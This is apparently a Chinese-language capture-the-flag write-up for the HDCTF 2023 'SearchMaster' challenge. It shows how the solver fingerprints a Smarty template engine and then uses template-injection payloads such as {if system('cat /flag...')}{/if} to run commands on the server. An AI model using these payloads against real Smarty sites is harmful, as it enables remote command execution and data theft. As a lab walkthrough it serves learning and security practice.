[HDCTF 2023]SearchMaster wp
信息搜集
题目页面:
这里提到了模板,猜测是模板注入,提示 POST 发包,参数名为 data 。
测试 POST 传参 data=1 :
有返回。
模板注入
检查模板类型
这里用橙子科技的一张图,红色箭头代表失败后执行的下一步,绿色箭头代表成功后执行的下一步。
首先传入 ${7*7} ,若返回 49 ,则执行成功:
执行成功。
那么接下来传入 a{*123*}b ,若 {**} 内的内容被当成注释,仅返回 ab ,则执行成功:
执行成功,判定为 Smarty 模板。
Smarty 模板注入
Smarty 是 PHP 的一个模板。
推荐博客:Smarty模板注入&CVE-2017-1000480
查看版本号:
{$smarty.version}
返回结果,版本 4.1.0 :
直接上 payload ,个人认为最好用的是 if 语句,if 代码块内可以执行任意 PHP 命令,不要加分号:
{if system('ls /')}{/if}
返回结果:
查看 flag 文件:
{if system('cat /flag_13_searchmaster')}{/if}
这条命令用 burp 发包成功了,用 hackerbar 发包却报错,有大佬知道原因吗?
用 hackerbar 发包:
用 burp 发包:
拿到 flag 。
![[<span style='color:red;'>HFCTF</span> <span style='color:red;'>2021</span> Final]easyflask](https://img-blog.csdnimg.cn/img_convert/6e798fc41d3694e52f7c86e2bac0a988.png)
![[<span style='color:red;'>HFCTF</span> <span style='color:red;'>2021</span> Final]easyflask](https://img-blog.csdnimg.cn/direct/6c991b489ed74927b853be4fbcb49fae.png)
![BUUCTF刷题记录 [<span style='color:red;'>HNCTF</span> <span style='color:red;'>2022</span> WEEK2]ez_ssrf](https://img-blog.csdnimg.cn/direct/666cb326e3b14710b5599fc6f011a8ba.png)
![[第五空间 <span style='color:red;'>2021</span>]WebFTP、[<span style='color:red;'>HCTF</span> 2018]Warmup](https://img-blog.csdnimg.cn/direct/b2ad719232ff458d936564b791ee632d.png)
![[<span style='color:red;'>HCTF</span> 2018]Warmup](https://img-blog.csdnimg.cn/direct/a768840ef6a64f6db13b9e3b4c54ecb2.png#pic_center)
